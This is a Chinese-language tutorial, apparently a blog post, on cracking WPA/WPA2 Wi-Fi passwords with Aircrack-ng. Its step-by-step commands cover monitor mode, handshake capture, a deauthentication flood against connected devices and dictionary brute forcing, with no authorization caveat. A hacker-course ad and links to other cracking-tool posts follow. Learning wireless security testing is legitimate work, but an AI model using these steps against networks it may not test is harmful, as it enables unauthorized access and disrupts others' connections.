无线密码破解工具 - Aircrack-ng
版本说明:Aircrack-ng1.6
下载地址:*https://download.aircrack-ng.org/aircrack-ng-1.6.tar.gz*
使用环境:Linux/Windows(kali自带)
工具说明:Aircrack-ng 是一款无线密码破解工具
一、工具说明
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。
Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a,802.11b,802.11g的数据。
该程序可运行在Linux和Windows上
如果在kali虚拟机里面破解无线密码的话需要插入外置网卡设备,设备能监听到数据即可,比如(RT3070),支持linux,免驱安装
在物理机则不需要,但是安装可能会比较麻烦,建议在kali里面弄
二、破解WPA/WPA2类WiFi操作
1、 查看可用的无线网卡
命令: airmon-ng
2、 将无线网卡以监听模式启动
命令:airmon-ng start wlan0
3、扫描周围WiFi
命令: airodump-ng wlan0mon
BSSID——wifi的mac地址、PWR——信号强度(结果一般是按强度排序)、Data——监听期间流量总合、CH——wifi所用信道、ENC——加密算法、ESSID——wifi名称
看到自己要破解的wifi后直接按Ctrl+C终止命令即可。我们这里的目标是名为pentest的wifi,其BSSID为EE:45:6A:0D:32:7A,信道为1
2.4 开始抓取握手包并保存成文件
命令:airodump-ng -c 1 --bssid EE:45:6A:0D:32:7A -w /root/1/ wlan0mon
# -c指定信道,一定要是上一步查到的要破解的wifi所用信道
# -bssid指定bssid值,一定要是上一步查到的要破解的wifi的bssid
# -w指定捕获的握手到保存到的文件名
2.5 强制对方WIFI断开重连(获取握手包)
在上一步中我们是被动等待,我们何时能抓取到握手包依赖于何时有设备与该wifi完成成功的认证。
但对于上一步这种有已连接设备的wifi,其实我们可以使用aireplay-ng进行deauth洪水攻击使已连接他的设备掉线,掉线设备一般会自动重新连接wifi这样我们就能轻松获取握手包。
保持上步抓包命令不中断,新打开一个窗口执行:
命令:aireplay-ng -0 2 -a EE:45:6A:0D:32:7A -c 34:29:12:60:14:3E wlan0mon
# -0表示通知设备断开连接
# 2表示攻击次数,小点大点都行吧
# -a指定仿造的wifi的mac地址(即bssid)
# -c表示要让认证失效的设备的mac地址,在上一步中可以看到
如下图所示,我们抓到了让其重新认证的EE:45:6A:0D:32:7A的握手包。使用Ctrl+C终止抓包命令即可
此时会在指定的目录产生以下四个文件(每执行一次抓包命令就会产生一组,所以抓包时要注意自己是第几次执行的;不管也行下一步执定文件时使用*号通配符即可)
6、使用字典文件暴力破解密码
aircrack-ng –a2 -b EE:45:6A:0D:32:7A -w common.txt ~/1/*.cap
# -a2 代表WPA的握手包
# -w指定要使用口令字典文件
# -b指定要目标wifi的mac地址(亦即bssid)
# *.cap是抓取到握手包的数据包文件,*是通配符
如果字典文件中存在wifi的密码,那就能找到wifi的密码,如果不包含那就找不到。(所以笼统地讲wifi成功破解率依赖于字典大小)
7、 关闭网卡监听模式【可选】
在第二步中我们使用airmon-ng将网卡以监听模式启动,最后我们将网卡还原回去
airmon-ng stop wlan0mon
黑客渗透视频教程,扫码免费领
无线密码破解工具 - Aircrack-ng相关推荐
- 十大最受欢迎的密码破解工具
1. Brutus Brutus是一个最流行的远程在线密码破解工具.它号称是最快和最灵活的密码破解工具.此工具是免费的,只可用于 Windows 系统.早在 2000 年 10 月发布了它. 它 支持 ...
- 十款最流行的密码破解工具
密码破解工具是普通计算机用户恢复遗忘密码.黑客窃取信息.渗透测试工程师测试应用安全常用的工具.密码破解工具通常都是通过穷举法,有些还配合使用密码字典来暴力破解密码,但这种方法的效率与密码的强度有很大关 ...
- 无线wifi破解工具之Aircrack-ng
无线wifi破解工具Aircrack-ng及破解过程实践 步骤一.选择具有Monitor模式的无线模块: 整理办公桌面时,扫到了三个模块, 一个是自己公司出的RTL8188EUS的USB模块, 另外个 ...
- oclhashcat:离线hash密码破解工具官方文档(中文版)
无聊中,就把hashcat的官方文档稍微翻译了下,方便初学的朋友查看.至于oclhashcat,它是一个离线的hash密码破解工具,与hashcat不同,它支持GPU破解,速度更快,并且支持更多的ha ...
- 小巧密码破解工具IE PassView使用指南
一:软件下载与安装 载完成后将压缩包解压,双击名称为"iepv_setup.exe"的可执行文件,弹出安装界面如图: 图一 点击安装后,会出现"安装成功"的对话 ...
- 【EWSA无线路由密码破解工具 中文特别版下载】含教程及字典(弱口令生日特殊符号等)
From: http://softbbs.zol.com.cn/1/32_8011.html Elcomsoft Wireless Security Auditor简称EWSA,是一款极为强悍的路由密 ...
- win7登录密码破解工具
http://bbs.360.cn/4004079/252123738.html win7登录密码破解工具(开机绕过登录密码) 软件分类:系统工具 运行环境:Win2000/WinXP/Win2003 ...
- John the Ripper 著名密码破解工具
著名密码破解工具 John the Ripper 发布了 1.9.0-jumbo-1 版本. John the Ripper 是一款速度很快的密码破解工具,目前可用于 Unix.macOS.Windo ...
- SQL Server密码破解工具简介
在对SQL Server系统执行入侵测试或者更高级别的安全审计时,有一种测试不应该被忽略,那就是SQL Server密码测试.这一点看起来显而易见,但是很多人都会忽略它. 密码测试可以帮助检查恶意入侵 ...
最新文章
- log4net按照不同的【LEVEL】级别输出到不同文件
- amd一点也不yes_[电脑]AMD:环顾四周,我只能超越自己了?5900Xamp;5600X VS 3900X开箱体验...
- 详细讲解Python字符串的各种内置方法
- qPCR实验疑难杂问解答
- 使用 做签名的post_ASP.NET WebApi 基于分布式Session方式实现Token签名认证
- tp模型和数据库操作方法
- mysql如何修改所有的definer
- tdd java_Java TDD简介–第2部分
- numpy 矩阵与向量相乘_有人把NumPy画成了花,生动又形象
- 充值加油卡骗局:一次伪金融诈骗为何能圈数亿
- windows和linux下读取文件乱码的终极解决办法!
- java中vector,array,list,arraylist的区别
- 为ASP.NET封装的SQL数据库访问类(转)
- 彻底解决电脑空闲时,Win音频设备图形隔离(系统进程)占用CPU的问题
- Monaco Editor教程(十七):代码信息指示器CodeLens配置详解
- 线性代数感悟之4 通过增广矩阵查看解的情况上篇
- vue axios轮询更新echarts 页面崩溃问题
- 33个CadQuery程序化建模实例
- 心已被爱伤透,情已为爱枯竭
- 多线程扑克牌发牌小白实现 -- 记录下自己代码点滴
热门文章
- Vim与Python真乃天作之和
- class com.sun.mail.smtp.SMTPAddressFailedException: 550 5.1.1 recipient is not exist
- 粒子群与蚁群算法的区别
- 【stm32入门】第二天环境搭建、RCC时钟、GPIO、闪烁实验与有源蜂鸣器实验
- 数字孪生的思考 04 - 元宇宙的思考
- linux mkdir命令用法,linux中的mkdir命令的详细解释
- Nginx-Lua-FastDFS-GraphicsMagick动态图片缩略图
- linux 脚本 wait,shell脚本使用 timeout + wait 完成: 超时退出执行,等待执行完毕并处理执行结果 - yanbin's Blog...
- 基于SSM+MYSQL写的javaWeb房屋租赁管理系统,包括系统前端和后台,页面美观,功能完善,非常高端的SSM源码
- QT设置非主窗口的背景图片和主窗口的背景图片(详细版)